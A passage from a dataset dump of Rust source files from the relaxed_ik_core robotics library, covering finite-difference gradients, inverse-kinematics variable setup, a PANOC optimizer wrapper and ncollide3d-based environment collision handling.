let f_h = self.objectives[*j].call(&x_h, vars, &frames_h);
grad[i] += self.weight_priors[*j] * ((-f_0s[*j] + f_h) / 0.0000001);
}
}
}
(obj, grad)
}
fn __gradient_lite(&self, x: &[f64], vars: &RelaxedIKVars) -> (f64, Vec<f64>) {
let mut grad: Vec<f64> = vec![0. ; x.len()];
let mut obj = 0.0;
let mut finite_diff_list: Vec<usize> = Vec::new();
let mut f_0s: Vec<f64> = Vec::new();
let poses_0 = vars.robot.get_ee_pos_and_quat_immutable(x);
for i in 0..self.objectives.len() {
if self.objectives[i].gradient_type() == 1 {
let (local_obj, local_grad) = self.objectives[i].gradient_lite(x, vars, &poses_0);
f_0s.push(local_obj);
obj += self.weight_priors[i] * local_obj;
for j in 0..local_grad.len() {
grad[j] += self.weight_priors[i] * local_grad[j];
}
} else if self.objectives[i].gradient_type() == 0 {
finite_diff_list.push(i);
let local_obj = self.objectives[i].call_lite(x, vars, &poses_0);
obj += self.weight_priors[i] * local_obj;
f_0s.push(local_obj);
}
}
if finite_diff_list.len() > 0 {
for i in 0..x.len() {
let mut x_h = x.to_vec();
x_h[i] += 0.0000001;
let poses_h = vars.robot.get_ee_pos_and_quat_immutable(x_h.as_slice());
for j in &finite_diff_list {
let f_h = self.objectives[*j].call_lite(x, vars, &poses_h);
grad[i] += self.weight_priors[*j] * ((-f_0s[*j] + f_h) / 0.0000001);
}
}
}
(obj, grad)
}
fn __gradient_finite_diff(&self, x: &[f64], vars: &RelaxedIKVars) -> (f64, Vec<f64>) {
let mut grad: Vec<f64> = vec![0. ; x.len()];
let mut f_0 = self.call(x, vars);
for i in 0..x.len() {
let mut x_h = x.to_vec();
x_h[i] += 0.000001;
let f_h = self.call(x_h.as_slice(), vars);
grad[i] = (-f_0 + f_h) / 0.000001;
}
(f_0, grad)
}
fn __gradient_finite_diff_lite(&self, x: &[f64], vars: &RelaxedIKVars) -> (f64, Vec<f64>) {
let mut grad: Vec<f64> = vec![0. ; x.len()];
let mut f_0 = self.call(x, vars);
for i in 0..x.len() {
let mut x_h = x.to_vec();
x_h[i] += 0.000001;
let f_h = self.__call_lite(x_h.as_slice(), vars);
grad[i] = (-f_0 + f_h) / 0.000001;
}
(f_0, grad)
}
} | rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/groove/vars.rs | src/groove/vars.rs | use nalgebra::{UnitQuaternion, Vector3, Vector6, Quaternion, Point3};
use crate::spacetime::robot::Robot;
use crate::utils_rust::file_utils::{*};
use time::PreciseTime;
use std::ops::Deref;
use yaml_rust::{YamlLoader, Yaml};
use std::fs::File;
use std::io::prelude::*;
use wasm_bindgen::prelude::*;
use serde::{Serialize, Deserialize};
#[derive(Serialize, Deserialize)]
pub struct VarsConstructorData {
// pub urdf: String,
pub link_radius:f64,
pub base_links: Vec<String>,
pub ee_links: Vec<String>,
starting_config: Vec<f64>
}
pub struct RelaxedIKVars {
pub robot: Robot,
pub init_state: Vec<f64>,
pub xopt: Vec<f64>,
pub prev_state: Vec<f64>,
pub prev_state2: Vec<f64>,
pub prev_state3: Vec<f64>,
pub goal_positions: Vec<Vector3<f64>>,
pub goal_quats: Vec<UnitQuaternion<f64>>,
pub tolerances: Vec<Vector6<f64>>,
pub init_ee_positions: Vec<Vector3<f64>>,
pub init_ee_quats: Vec<UnitQuaternion<f64>>
}
impl RelaxedIKVars {
pub fn from_local_settings(path_to_setting: &str) -> Self {
let path_to_src = get_path_to_src();
let mut file = File::open(path_to_setting).unwrap();
let mut contents = String::new();
let res = file.read_to_string(&mut contents).unwrap();
let docs = YamlLoader::load_from_str(contents.as_str()).unwrap();
let settings = &docs[0];
let path_to_urdf = path_to_src + "configs/urdfs/" + settings["urdf"].as_str().unwrap();
println!("RelaxedIK is using below URDF file: {}", path_to_urdf);
let chain = k::Chain::<f64>::from_urdf_file(path_to_urdf.clone()).unwrap();
let base_links_arr = settings["base_links"].as_vec().unwrap();
let ee_links_arr = settings["ee_links"].as_vec().unwrap();
let num_chains = base_links_arr.len();
let mut base_links = Vec::new();
let mut ee_links = Vec::new();
let mut tolerances: Vec<Vector6<f64>> = Vec::new();
for i in 0..num_chains {
base_links.push(base_links_arr[i].as_str().unwrap().to_string());
ee_links.push(ee_links_arr[i].as_str().unwrap().to_string());
tolerances.push(Vector6::new(0., 0., 0., 0., 0., 0.));
}
let urdf = &std::fs::read_to_string(path_to_urdf).unwrap();
let robot = Robot::from_urdf(urdf, &base_links, &ee_links);
let mut starting_config = Vec::new();
if settings["starting_config"].is_badvalue() {
println!("No starting config provided, using all zeros");
for i in 0..robot.num_dofs {
starting_config.push(0.0);
}
} else {
let starting_config_arr = settings["starting_config"].as_vec().unwrap();
for i in 0..starting_config_arr.len() {
starting_config.push(starting_config_arr[i].as_f64().unwrap());
}
}
let mut init_ee_positions: Vec<Vector3<f64>> = Vec::new();
let mut init_ee_quats: Vec<UnitQuaternion<f64>> = Vec::new();
let pose = robot.get_ee_pos_and_quat_immutable(&starting_config);
assert!(pose.len() == num_chains);
for i in 0..pose.len() {
init_ee_positions.push(pose[i].0);
init_ee_quats.push(pose[i].1);
}
RelaxedIKVars{robot, init_state: starting_config.clone(), xopt: starting_config.clone(),
prev_state: starting_config.clone(), prev_state2: starting_config.clone(), prev_state3: starting_config.clone(),
goal_positions: init_ee_positions.clone(), goal_quats: init_ee_quats.clone(), tolerances, init_ee_positions, init_ee_quats}
}
// for webassembly
pub fn from_jsvalue( configs: VarsConstructorData, urdf: &str) -> Self {
let num_chains = configs.base_links.len();
let mut tolerances: Vec<Vector6<f64>> = Vec::new();
for i in 0..num_chains {
tolerances.push(Vector6::new(0., 0., 0., 0., 0., 0.));
}
let robot = Robot::from_urdf(urdf, &configs.base_links, &configs.ee_links);
let mut init_ee_positions: Vec<Vector3<f64>> = Vec::new();
let mut init_ee_quats: Vec<UnitQuaternion<f64>> = Vec::new();
let pose = robot.get_ee_pos_and_quat_immutable(&configs.starting_config);
assert!(pose.len() == num_chains);
for i in 0..pose.len() {
init_ee_positions.push(pose[i].0);
init_ee_quats.push(pose[i].1);
}
RelaxedIKVars{robot, init_state: configs.starting_config.clone(), xopt: configs.starting_config.clone(),
prev_state: configs.starting_config.clone(), prev_state2: configs.starting_config.clone(), prev_state3: configs.starting_config.clone(),
goal_positions: init_ee_positions.clone(), goal_quats: init_ee_quats.clone(), tolerances, init_ee_positions, init_ee_quats}
}
pub fn update(&mut self, xopt: Vec<f64>) {
self.prev_state3 = self.prev_state2.clone();
self.prev_state2 = self.prev_state.clone();
self.prev_state = self.xopt.clone();
self.xopt = xopt.clone();
}
pub fn reset(&mut self, init_state: Vec<f64>) {
self.prev_state3 = init_state.clone();
self.prev_state2 = init_state.clone();
self.prev_state = init_state.clone();
self.xopt = init_state.clone();
self.init_state = init_state.clone();
let mut init_ee_positions: Vec<Vector3<f64>> = Vec::new();
let mut init_ee_quats: Vec<UnitQuaternion<f64>> = Vec::new();
let pose = self.robot.get_ee_pos_and_quat_immutable(&init_state);
for i in 0..pose.len() {
init_ee_positions.push(pose[i].0);
init_ee_quats.push(pose[i].1);
}
self.init_ee_positions = init_ee_positions.clone();
self.init_ee_quats = init_ee_quats.clone();
}
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/groove/groove.rs | src/groove/groove.rs | use crate::groove::gradient::{ForwardFiniteDiff, CentralFiniteDiff, GradientFinder, ForwardFiniteDiffImmutable, CentralFiniteDiffImmutable, GradientFinderImmutable};
use crate::groove::vars::{RelaxedIKVars};
use optimization_engine::{constraints::*, panoc::*, *};
use crate::groove::objective_master::ObjectiveMaster;
pub struct OptimizationEngineOpen {
dim: usize,
cache: PANOCCache
}
impl OptimizationEngineOpen {
pub fn new(dim: usize) -> Self {
let mut cache = PANOCCache::new(dim, 1e-14, 10);
OptimizationEngineOpen { dim, cache }
}
pub fn optimize(&mut self, x: &mut [f64], v: &RelaxedIKVars, om: &ObjectiveMaster, max_iter: usize) {
let df = |u: &[f64], grad: &mut [f64]| -> Result<(), SolverError> {
let (my_obj, my_grad) = om.gradient(u, v);
for i in 0..my_grad.len() {
grad[i] = my_grad[i];
}
Ok(())
};
let f = |u: &[f64], c: &mut f64| -> Result<(), SolverError> {
*c = om.call(u, v);
Ok(())
};
// let bounds = NoConstraints::new();
let bounds = Rectangle::new(Option::from(v.robot.lower_joint_limits.as_slice()), Option::from(v.robot.upper_joint_limits.as_slice()));
/* PROBLEM STATEMENT */
let problem = Problem::new(&bounds, df, f);
let mut panoc = PANOCOptimizer::new(problem, &mut self.cache).with_max_iter(max_iter).with_tolerance(0.0005);
// let mut panoc = PANOCOptimizer::new(problem, &mut self.cache);
// Invoke the solver
let status = panoc.solve(x);
// println!("Panoc status: {:#?}", status);
// println!("Panoc solution: {:#?}", x);
}
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/groove/mod.rs | src/groove/mod.rs | pub mod objective;
pub mod groove;
pub mod vars;
pub mod gradient;
pub mod objective_master;
// pub mod env_collision; | rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/groove/env_collision.rs | src/groove/env_collision.rs | use crate::utils_rust::yaml_utils::EnvCollisionFileParser;
use nalgebra::{Vector3, Isometry3, Point3};
use nalgebra::geometry::{Translation3, UnitQuaternion, Quaternion};
use ncollide3d::pipeline::{*};
use ncollide3d::shape::{*};
use std::collections::BTreeMap;
#[derive(Clone, Debug)]
pub struct LinkData {
pub is_link: bool,
pub arm_idx: i32,
}
impl LinkData {
pub fn new(is_link: bool, arm_idx: i32) -> LinkData {
Self {
is_link: is_link,
arm_idx: arm_idx,
}
}
}
#[derive(Clone, Debug)]
pub struct CollisionObjectData {
pub name: String,
pub link_data: LinkData,
}
impl CollisionObjectData {
pub fn new(name: String, link_data: LinkData) -> CollisionObjectData {
Self {
name: name,
link_data: link_data,
}
}
}
pub struct RelaxedIKEnvCollision {
pub world: CollisionWorld<f64, CollisionObjectData>,
pub link_radius: f64,
pub link_handles: Vec<Vec<CollisionObjectSlabHandle>>,
pub dyn_obstacle_handles: Vec<(CollisionObjectSlabHandle, String)>,
pub active_pairs: Vec<BTreeMap<CollisionObjectSlabHandle, Vec<CollisionObjectSlabHandle>>>,
pub active_obstacles: Vec<Vec<(Option<CollisionObjectSlabHandle>, f64)>>,
}
impl RelaxedIKEnvCollision {
pub fn init_collision_world (
env_collision_file: EnvCollisionFileParser,
frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>,
) -> Self {
let link_radius = env_collision_file.robot_link_radius;
let plane_obstacles = env_collision_file.cuboids;
let sphere_obstacles = env_collision_file.spheres;
let pcd_obstacles = env_collision_file.pcds;
// The links are part of group 1 and can only interact with obstacles
let mut link_groups = CollisionGroups::new();
link_groups.set_membership(&[1]);
link_groups.set_blacklist(&[1]);
link_groups.set_whitelist(&[2]);
// All the other objects are part of the group 2 and interact only with the links
let mut others_groups = CollisionGroups::new();
others_groups.set_membership(&[2]);
others_groups.set_blacklist(&[2]);
others_groups.set_whitelist(&[1]);
let proximity_query = GeometricQueryType::Proximity(20.0 * link_radius);
let mut world = CollisionWorld::new(0.0);
let mut link_handles: Vec<Vec<CollisionObjectSlabHandle>> = Vec::new();
let mut active_pairs: Vec<BTreeMap<CollisionObjectSlabHandle, Vec<CollisionObjectSlabHandle>>> = Vec::new();
let mut active_obstacles: Vec<Vec<(Option<CollisionObjectSlabHandle>, f64)>> = Vec::new();
for arm_idx in 0..frames.len() {
let mut handles: Vec<CollisionObjectSlabHandle> = Vec::new();
let mut obstacles: Vec<(Option<CollisionObjectSlabHandle>, f64)> = Vec::new();
let pair: BTreeMap<CollisionObjectSlabHandle, Vec<CollisionObjectSlabHandle>> = BTreeMap::new();
let last_elem = frames[arm_idx].0.len() - 1;
for i in 0..last_elem {
let start_pt = Point3::from(frames[arm_idx].0[i]);
let end_pt = Point3::from(frames[arm_idx].0[i + 1]);
let segment = ShapeHandle::new(Segment::new(start_pt, end_pt));
let segment_pos = nalgebra::one();
let link_data = CollisionObjectData::new(format!("Link {}", i), LinkData::new(true, arm_idx as i32));
let handle = world.add(segment_pos, segment, link_groups, proximity_query, link_data);
handles.push(handle.0);
obstacles.push((None, 0.0));
}
link_handles.push(handles);
active_pairs.push(pair);
active_obstacles.push(obstacles);
}
let mut dyn_obstacle_handles: Vec<(CollisionObjectSlabHandle, String)> = Vec::new();
for i in 0..plane_obstacles.len() {
let plane_obs = &plane_obstacles[i];
let half_extents = Vector3::new(plane_obs.x_halflength, plane_obs.y_halflength, plane_obs.z_halflength);
let plane = ShapeHandle::new(Cuboid::new(half_extents));
let plane_ts = Translation3::new(plane_obs.tx, plane_obs.ty, plane_obs.tz);
let plane_rot = UnitQuaternion::from_euler_angles(plane_obs.rx, plane_obs.ry, plane_obs.rz);
let plane_pos = Isometry3::from_parts(plane_ts, plane_rot);
let plane_data = CollisionObjectData::new(plane_obs.name.clone(), LinkData::new(false, -1));
let plane_handle = world.add(plane_pos, plane, others_groups, proximity_query, plane_data);
if plane_obs.is_dynamic {
dyn_obstacle_handles.push((plane_handle.0, plane_handle.1.data().name.clone()));
}
}
for i in 0..sphere_obstacles.len() {
let sphere_obs = &sphere_obstacles[i];
let sphere = ShapeHandle::new(Ball::new(sphere_obs.radius));
let sphere_ts = Translation3::new(sphere_obs.tx, sphere_obs.ty, sphere_obs.tz);
let sphere_rot = UnitQuaternion::identity();
let sphere_pos = Isometry3::from_parts(sphere_ts, sphere_rot);
let sphere_data = CollisionObjectData::new(sphere_obs.name.clone(), LinkData::new(false, -1));
let sphere_handle = world.add(sphere_pos, sphere, others_groups, proximity_query, sphere_data);
if sphere_obs.is_dynamic {
dyn_obstacle_handles.push((sphere_handle.0, sphere_handle.1.data().name.clone()));
}
}
for i in 0..pcd_obstacles.len() {
let pcd_obs = &pcd_obstacles[i];
// let mut shapes: Vec<(Isometry3<f64>, ShapeHandle<f64>)> = Vec::new();
// for sphere_obs in &pcd_obs.points {
// let sphere = ShapeHandle::new(Ball::new(sphere_obs.radius));
// let sphere_ts = Translation3::new(sphere_obs.tx, sphere_obs.ty, sphere_obs.tz);
// let sphere_rot = UnitQuaternion::identity();
// let sphere_pos = Isometry3::from_parts(sphere_ts, sphere_rot);
// shapes.push((sphere_pos, sphere));
// }
let mut points: Vec<Point3<f64>> = Vec::new();
for sphere_obs in &pcd_obs.points {
points.push(Point3::new(sphere_obs.tx, sphere_obs.ty, sphere_obs.tz));
}
// let pcd = ShapeHandle::new(Compound::new(shapes));
let pcd = ShapeHandle::new(ConvexHull::try_from_points(&points).unwrap());
let pcd_ts = Translation3::new(pcd_obs.tx, pcd_obs.ty, pcd_obs.tz);
let pcd_rot = UnitQuaternion::from_euler_angles(pcd_obs.rx, pcd_obs.ry, pcd_obs.rz);
let pcd_pos = Isometry3::from_parts(pcd_ts, pcd_rot);
let pcd_data = CollisionObjectData::new(pcd_obs.name.clone(), LinkData::new(false, -1));
let pcd_handle = world.add(pcd_pos, pcd, others_groups, proximity_query, pcd_data);
if pcd_obs.is_dynamic {
dyn_obstacle_handles.push((pcd_handle.0, pcd_handle.1.data().name.clone()));
}
}
return Self{world, link_radius, link_handles, dyn_obstacle_handles, active_pairs, active_obstacles};
}
pub fn update_links(
&mut self,
frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>,
) {
for arm_idx in 0..frames.len() {
let last_elem = frames[arm_idx].0.len() - 1;
for i in 0..last_elem {
let start_pt = Point3::from(frames[arm_idx].0[i]);
let end_pt = Point3::from(frames[arm_idx].0[i + 1]);
let segment = ShapeHandle::new(Segment::new(start_pt, end_pt));
let link = self.world.objects.get_mut(self.link_handles[arm_idx][i]).unwrap();
link.set_shape(segment);
}
}
}
pub fn update_dynamic_obstacle(
&mut self,
name: &str,
position: Isometry3<f64>,
) {
for (handle, id) in &self.dyn_obstacle_handles {
if id == name {
let co = self.world.objects.get_mut(*handle).unwrap();
co.set_position(position);
break;
}
}
}
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/groove/gradient.rs | src/groove/gradient.rs |
pub trait GradientFinderImmutable<F>
where F: Fn(&[f64]) -> f64 {
fn new(dim: usize, f: F) -> Self;
fn compute_gradient(&mut self, x: &[f64]);
fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64>;
fn compute_gradient_immutable(&self, x: &[f64]) -> Vec<f64>;
fn reset(&mut self, x: &[f64]);
}
pub struct ForwardFiniteDiffImmutable<F>
where F: Fn(&[f64]) -> f64
{
pub dim: usize,
pub f: F,
pub h: f64,
pub out_grad: Vec<f64>,
__x_h: Vec<f64>
}
impl<F> GradientFinderImmutable<F> for ForwardFiniteDiffImmutable<F>
where F: Fn(&[f64]) -> f64
{
fn new(dim: usize, f: F) -> Self {
let mut out_grad: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
out_grad.push(0.0);
}
let mut __x_h: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
__x_h.push(0.0);
}
ForwardFiniteDiffImmutable{dim, f, h: 0.00001, out_grad, __x_h}
}
fn compute_gradient(&mut self, x: &[f64]) {
let val_0 = (self.f)(x);
for (i, val) in x.iter().enumerate() {
self.reset(x);
self.__x_h[i] += self.h;
self.out_grad[i] = (-val_0 + (self.f)(&self.__x_h)) / self.h;
}
}
fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64> {
self.compute_gradient(x);
self.out_grad.clone()
}
fn compute_gradient_immutable(&self, x: &[f64]) -> Vec<f64> {
let mut out: Vec<f64> = Vec::new();
let val_0 = (self.f)(x);
for i in 0..x.len() {
let mut x_h = x.clone().to_vec();
x_h[i] += self.h;
out.push((-val_0 + (self.f)(x_h.as_slice())) / self.h);
}
out
}
fn reset(&mut self, x: &[f64]) {
for i in 0..self.dim {
self.__x_h[i] = x[i];
}
}
}
pub struct CentralFiniteDiffImmutable<F>
where F: Fn(&[f64]) -> f64
{
pub dim: usize,
pub f: F,
pub h: f64,
pub out_grad: Vec<f64>,
__x_hf: Vec<f64>,
__x_hb: Vec<f64>
}
impl<F> GradientFinderImmutable<F> for CentralFiniteDiffImmutable<F>
where F: Fn(&[f64]) -> f64
{
fn new(dim: usize, f: F) -> Self {
let mut out_grad: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
out_grad.push(0.0);
}
let mut __x_hf: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
__x_hf.push(0.0);
}
let mut __x_hb: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
__x_hb.push(0.0);
}
CentralFiniteDiffImmutable{dim, f, h: 0.0001, out_grad, __x_hf, __x_hb}
}
fn compute_gradient(&mut self, x: &[f64]) {
for (i, val) in x.iter().enumerate() {
self.reset(x);
self.__x_hf[i] += self.h;
self.__x_hb[i] -= self.h;
self.out_grad[i] = (-0.5 * (self.f)(&self.__x_hb) + 0.5 * (self.f)(&self.__x_hf)) / self.h;
}
}
fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64> {
self.compute_gradient(x);
self.out_grad.clone()
}
fn compute_gradient_immutable(&self, x: &[f64]) -> Vec<f64> {
let mut out: Vec<f64> = Vec::new();
for (i, val) in x.iter().enumerate() {
let mut x_hf = x.clone().to_vec();
let mut x_hb = x.clone().to_vec();
x_hf[i] += self.h;
x_hb[i] -= self.h;
out.push( (-0.5 * (self.f)(x_hb.as_slice()) + 0.5 * (self.f)(x_hf.as_slice())) / self.h);
}
out
}
fn reset(&mut self, x: &[f64]) {
for i in 0..self.dim {
self.__x_hf[i] = x[i];
self.__x_hb[i] = x[i];
}
}
}
pub struct CentralFiniteDiff2Immutable<F>
where F: Fn(&[f64]) -> f64
{
pub dim: usize,
pub f: F,
pub h: f64,
pub out_grad: Vec<f64>,
__x_hf1: Vec<f64>,
__x_hb1: Vec<f64>,
__x_hf2: Vec<f64>,
__x_hb2: Vec<f64>
}
impl<F> GradientFinderImmutable<F> for CentralFiniteDiff2Immutable<F>
where F: Fn(&[f64]) -> f64
{
fn new(dim: usize, f: F) -> Self {
let mut out_grad: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
out_grad.push(0.0);
}
let mut __x_hf1: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
__x_hf1.push(0.0);
}
let mut __x_hb1: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
__x_hb1.push(0.0);
}
let mut __x_hf2: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
__x_hf2.push(0.0);
}
let mut __x_hb2: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
__x_hb2.push(0.0);
}
CentralFiniteDiff2Immutable{dim, f, h: 0.0001, out_grad, __x_hf1, __x_hb1, __x_hf2, __x_hb2}
}
fn compute_gradient(&mut self, x: &[f64]) {
for (i, val) in x.iter().enumerate() {
self.reset(x);
self.__x_hf1[i] += self.h;
self.__x_hb1[i] -= self.h;
self.__x_hf2[i] += 2.0*self.h;
self.__x_hb2[i] -= 2.0*self.h;
self.out_grad[i] = ((1. / 12.) * (self.f)(&self.__x_hb2) + -(2. / 3.) * (self.f)(&self.__x_hb1) + (2. / 3.) * (self.f)(&self.__x_hf1) - (1. / 12.) * (self.f)(&self.__x_hf2)) / self.h;
}
}
fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64> {
self.compute_gradient(x);
self.out_grad.clone()
}
fn compute_gradient_immutable(&self, x: &[f64]) -> Vec<f64> {
let mut out: Vec<f64> = Vec::new();
for (i, val) in x.iter().enumerate() {
let mut x_hf1 = x.clone().to_vec();
let mut x_hb1 = x.clone().to_vec();
let mut x_hf2 = x.clone().to_vec();
let mut x_hb2 = x.clone().to_vec();
x_hf1[i] += self.h;
x_hb1[i] -= self.h;
x_hf2[i] += 2.0*self.h;
x_hb2[i] -= 2.0*self.h;
out.push( ((1. / 12.) * (self.f)(x_hb2.as_slice()) + -(2. / 3.) * (self.f)(x_hb1.as_slice()) + (2. / 3.) * (self.f)(x_hf1.as_slice()) - (1. / 12.) * (self.f)(x_hf2.as_slice())) / self.h);
}
out
}
fn reset(&mut self, x: &[f64]) {
for i in 0..self.dim {
self.__x_hf1[i] = x[i];
self.__x_hb1[i] = x[i];
self.__x_hf2[i] = x[i];
self.__x_hb2[i] = x[i];
}
}
}
pub trait GradientFinder<F>
where F: FnMut(&[f64]) -> f64 {
fn new(dim: usize, f: F) -> Self;
fn compute_gradient(&mut self, x: &[f64]);
fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64>;
fn reset(&mut self, x: &[f64]);
}
pub struct ForwardFiniteDiff<F>
where F: FnMut(&[f64]) -> f64
{
pub dim: usize,
pub f: F,
pub h: f64,
pub out_grad: Vec<f64>,
__x_h: Vec<f64>
}
impl<F> GradientFinder<F> for ForwardFiniteDiff<F>
where F: FnMut(&[f64]) -> f64
{
fn new(dim: usize, f: F) -> Self {
let mut out_grad: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
out_grad.push(0.0);
}
let mut __x_h: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
__x_h.push(0.0);
}
ForwardFiniteDiff{dim, f, h: 0.00001, out_grad, __x_h}
}
fn compute_gradient(&mut self, x: &[f64]) {
let val_0 = (self.f)(x);
for (i, val) in x.iter().enumerate() {
self.reset(x);
self.__x_h[i] += self.h;
self.out_grad[i] = (-val_0 + (self.f)(&self.__x_h)) / self.h;
}
}
fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64> {
self.compute_gradient(x);
self.out_grad.clone()
}
fn reset(&mut self, x: &[f64]) {
for i in 0..self.dim {
self.__x_h[i] = x[i];
}
}
}
pub struct CentralFiniteDiff<F>
where F: FnMut(&[f64]) -> f64
{
pub dim: usize,
pub f: F,
pub h: f64,
pub out_grad: Vec<f64>,
__x_hf: Vec<f64>,
__x_hb: Vec<f64>
}
impl<F> GradientFinder<F> for CentralFiniteDiff<F>
where F: FnMut(&[f64]) -> f64
{
fn new(dim: usize, f: F) -> CentralFiniteDiff<F> {
let mut out_grad: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
out_grad.push(0.0);
}
let mut __x_hf: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
__x_hf.push(0.0);
}
let mut __x_hb: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
__x_hb.push(0.0);
}
CentralFiniteDiff{dim, f, h: 0.0001, out_grad, __x_hf, __x_hb}
}
fn compute_gradient(&mut self, x: &[f64]) {
for (i, val) in x.iter().enumerate() {
self.reset(x);
self.__x_hf[i] += self.h;
self.__x_hb[i] -= self.h;
self.out_grad[i] = (-0.5 * (self.f)(&self.__x_hb) + 0.5 * (self.f)(&self.__x_hf)) / self.h;
}
}
fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64> {
self.compute_gradient(x);
self.out_grad.clone()
}
fn reset(&mut self, x: &[f64]) {
for i in 0..self.dim {
self.__x_hf[i] = x[i];
self.__x_hb[i] = x[i];
}
}
}
pub struct CentralFiniteDiff2<F>
where F: FnMut(&[f64]) -> f64
{
pub dim: usize,
pub f: F,
pub h: f64,
pub out_grad: Vec<f64>,
__x_hf1: Vec<f64>,
__x_hb1: Vec<f64>,
__x_hf2: Vec<f64>,
__x_hb2: Vec<f64>
}
impl<F> GradientFinder<F> for CentralFiniteDiff2<F>
where F: FnMut(&[f64]) -> f64
{
fn new(dim: usize, f: F) -> CentralFiniteDiff2<F> {
let mut out_grad: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
out_grad.push(0.0);
}
let mut __x_hf1: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
__x_hf1.push(0.0);
}
let mut __x_hb1: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
__x_hb1.push(0.0);
}
let mut __x_hf2: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
__x_hf2.push(0.0);
}
let mut __x_hb2: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
__x_hb2.push(0.0);
}
CentralFiniteDiff2{dim, f, h: 0.0001, out_grad, __x_hf1, __x_hb1, __x_hf2, __x_hb2}
}
fn compute_gradient(&mut self, x: &[f64]) {
for (i, val) in x.iter().enumerate() {
self.reset(x);
self.__x_hf1[i] += self.h;
self.__x_hb1[i] -= self.h;
self.__x_hf2[i] += 2.0*self.h;
self.__x_hb2[i] -= 2.0*self.h;
self.out_grad[i] = ((1. / 12.) * (self.f)(&self.__x_hb2) + -(2. / 3.) * (self.f)(&self.__x_hb1) + (2. / 3.) * (self.f)(&self.__x_hf1) - (1. / 12.) * (self.f)(&self.__x_hf2)) / self.h;
}
}
fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64> {
self.compute_gradient(x);
self.out_grad.clone()
}
fn reset(&mut self, x: &[f64]) {
for i in 0..self.dim {
self.__x_hf1[i] = x[i];
self.__x_hb1[i] = x[i];
self.__x_hf2[i] = x[i];
self.__x_hb2[i] = x[i];
}
}
}
/*
pub trait GradientFinder2<'a, F>
where F: FnMut(&[f64]) -> f64 {
fn new(dim: usize, f: &'a F) -> Self;
fn compute_gradient(&mut self, x: &[f64]);
fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64>;
fn reset(&mut self, x: &[f64]);
}
pub struct ForwardFiniteDiff2<'a, F>
where F: FnMut(&[f64]) -> f64
{
pub dim: usize,
pub f: &'a F,
pub h: f64,
pub out_grad: Vec<f64>,
__x_h: Vec<f64>
}
impl<'a, F> GradientFinder2<'a, F> for ForwardFiniteDiff2<'a, F>
where F: FnMut(&[f64]) -> f64
{
fn new(dim: usize, f: &'a F) -> Self {
let mut out_grad: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
out_grad.push(0.0);
}
let mut __x_h: Vec<f64> = Vec::with_capacity(dim);
for i in 0..dim {
__x_h.push(0.0);
}
ForwardFiniteDiff2{dim, f, h: 0.00001, out_grad, __x_h}
}
fn compute_gradient(&mut self, x: &[f64]) {
let val_0 = (self.f)(x);
for (i, val) in x.iter().enumerate() {
self.reset(x);
self.__x_h[i] += self.h;
self.out_grad[i] = (-val_0 + (self.f)(&self.__x_h)) / self.h;
}
}
fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64> {
self.compute_gradient(x);
self.out_grad.clone()
}
fn reset(&mut self, x: &[f64]) {
for i in 0..self.dim {
self.__x_h[i] = x[i];
}
}
}
*/
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/spacetime/arm.rs | src/spacetime/arm.rs | use nalgebra;
